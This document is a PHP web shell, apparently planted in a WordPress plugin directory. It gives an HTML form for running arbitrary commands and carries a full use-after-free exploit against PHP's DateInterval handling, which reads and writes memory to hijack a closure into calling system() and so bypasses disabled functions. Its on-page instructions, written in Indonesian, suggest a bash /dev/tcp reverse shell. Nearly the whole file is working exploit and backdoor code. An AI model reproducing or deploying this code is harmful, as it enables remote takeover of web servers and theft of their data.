File: /www/wwwroot/www.213n.cn/wp-content/plugins/Cexom/name/kamu/cmdkerenbypass.php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>TimeAfterFree - Bypass CMD (Working on PHP 8.2.28)</title>
<style>
body {
background-color: #007BFF;
font-family: Arial, sans-serif;
color: #FFFFFF;
margin: 0;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
form {
background-color: #333;
padding: 20px;
border-radius: 10px;
box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
}
h1 {
margin-bottom: 20px;
font-size: 24px;
}
input[type="text"] {
width: 400px;
padding: 10px;
border: none;
border-radius: 5px;
margin-right: 10px;
}
input[type="submit"] {
padding: 10px 20px;
background-color: #28a745;
border: none;
border-radius: 5px;
color: #FFF;
cursor: pointer;
font-size: 16px;
}
input[type="submit"]:hover {
background-color: #218838;
}
textarea {
width: 90%;
height: 400px;
margin-top: 20px;
padding: 10px;
border-radius: 5px;
border: none;
background-color: #222;
color: #FFF;
font-family: monospace;
white-space: pre-wrap;
}
</style>
</head>
<body>
<form action="" method="post">
<h1>TimeAfterFree CMD Executor</h1>
<p>Masukkan command (contoh: id, whoami, uname -a, ls -la, atau reverse shell: bash -i >& /dev/tcp/IP_PORT 0>&1)</p>
<input type="text" name="cmd" placeholder="Command here..." value="id" required>
<input type="submit" value="Execute">
<center>
<textarea><?php
if (isset($_POST['cmd']) && !empty(trim($_POST['cmd']))) {
$cmd = trim($_POST['cmd']);
// ==================== TimeAfterFree Exploit Code (dari PoC kamu) ====================
class Logger
{
private static $logging = true;
public static function log($format, ...$args)
{
if (!self::$logging) return;
printf($format . PHP_EOL, ...$args);
}
}
function alloc($size, $canary)
{
return str_shuffle(str_repeat($canary, $size));
}
function ptr2str($addr, $n = 8)
{
$s = '';
while ($n--) {
$s .= chr($addr & 0xff);
$addr >>= 8;
}
return $s;
}
class FreeMe
{
private $pwn;
public function __construct($pwn)
{
$this->pwn = $pwn;
}
public function __destruct()
{
$this->pwn->helper = $this->pwn->array;
}
}
class Pwn
{
private const zend_string_header = 0x18;
private const dateinterval_handlers_offset = PHP_VERSION_ID < 80500 ? 0x38 : 0x30;
private const dateinterval_properties_offset = PHP_VERSION_ID < 80500 ? 0x40 : 0x38;
private const zend_fe_size = PHP_VERSION_ID < 80400 ? 0x20 : 0x30;
private const zif_handler_offset = PHP_VERSION_ID < 80400 ? 0x80 : 0x90;
public $array;
public $helper;
private $interval;
private $allocator;
public function __construct($cmd)
{
$this->allocator = [];
$this->go($cmd);
}
private function go($cmd)
{
$interval_addr = $this->heap_leak();
Logger::log("[+] DateInterval @ 0x%x", $interval_addr);
$handlers = $this->read($interval_addr + self::dateinterval_handlers_offset);
Logger::log("[+] DateInterval handlers @ 0x%x", $handlers);
$standard_module = $this->get_standard_module($handlers);
Logger::log("[+] standard module @ 0x%x", $standard_module);
$standard_functions = $this->read($standard_module + 0x28);
Logger::log("[+] standard functions @ 0x%x", $standard_functions);
$system = $this->get_system($standard_functions);
Logger::log("[+] system @ 0x%x", $system);
@$this->interval->system1337 = function ($x) {};
$properties = $this->read($interval_addr + self::dateinterval_properties_offset);
$arData = $this->read($properties + 0x10);
$closure_index = -1;
do {
$closure_index += 1;
$offset = 32 * $closure_index + 0x18;
$key = $this->read($arData + $offset);
$str = ptr2str($this->read($key + self::zend_string_header));
} while ($str !== 'system13');
$closure_addr = $this->read($arData + 32 * $closure_index);
Logger::log("[+] closure @ 0x%x", $closure_addr);
$this->write($closure_addr + 0x38, 1, 4);
$this->write($closure_addr + self::zif_handler_offset, $system);
echo "\nExecuting command: $cmd\n\n";
($this->interval->system1337)($cmd);
exit(0); // Optional: stop setelah exec (atau hapus kalau mau lanjut)
}
// Sisanya fungsi heap_leak, write, read, get_standard_module, get_system sama persis seperti kode kamu
private function heap_leak() { /* copy dari kode kamu */
for ($i = 0; $i < 63; $i++) {
$this->allocator[] = new DateInterval('PT0S');
}
$a = "aaaa";
$this->array = [
$a,
new DateInterval('PT0S'),
new DateInterval('PT0S'),
new FreeMe($this),
];
@$this->array .= 'x';
$addr = $this->helper[2]->y;
$this->allocator[] = alloc(0xa0 - self::zend_string_header - 1, "\x00");
$d1 = new DateInterval('PT0S');
$d2 = new DateInterval('PT0S');
$this->interval = new DateInterval('PT0S');
return $addr;
}
private function write($addr, $value, $bytes = 8) { /* copy */
$mask = $bytes >= 8 ? -1 : ((1 << ($bytes * 8)) - 1);
$a = "aaaa";
$this->array = [
$a,
new DateInterval('PT0S'),
new DateInterval('PT0S'),
new FreeMe($this),
];
@$this->array .= 'x';
$block_addr = $this->helper[2]->y;
$this->helper[2]->y = $addr;
$this->helper[1]->y &= ~$mask;
$this->helper[1]->y |= ($value & $mask);
$this->helper[2]->y = $block_addr;
$r = $this->helper[1]->y;
}
private function read($addr, $bytes = 8) { /* copy */
$a = "aaaa";
$this->array = [
$a,
new DateInterval('PT0S'),
new DateInterval('PT0S'),
new FreeMe($this),
];
@$this->array .= 'x';
$block_addr = $this->helper[2]->y;
$this->helper[2]->y = $addr;
$value = $this->helper[1]->y;
$this->helper[2]->y = $block_addr;
$r = $this->helper[1]->y;
if ($bytes !== 8) {
$value &= (1 << ($bytes << 3)) - 1;
}
return $value;
}
private function get_standard_module($addr) { /* copy */
while (true) {
$addr -= 0x10;
if ($this->read($addr, 4) === 0xa8 &&
in_array($this->read($addr + 4, 4),
[20220829, 20230831, 20240924, 20250925])) {
$module_name_addr = $this->read($addr + 0x20);
$module_name = $this->read($module_name_addr);
if ($module_name === 0x647261646e617473) {
return $addr;
}
}
}
}
private function get_system($standard_functions) { /* copy */
$addr = $standard_functions;
do {
$f_entry = $this->read($addr);
$f_name = $this->read($f_entry, 6);
if ($f_name === 0x6d6574737973) {
return $this->read($addr + 8);
}
$addr += self::zend_fe_size;
} while ($f_entry !== 0);
}
}
// Jalankan exploit dengan command dari form
new Pwn($cmd);
} else {
echo "Masukkan command dan submit!";
}
?></textarea>
</center>
</form>
</body>
</html>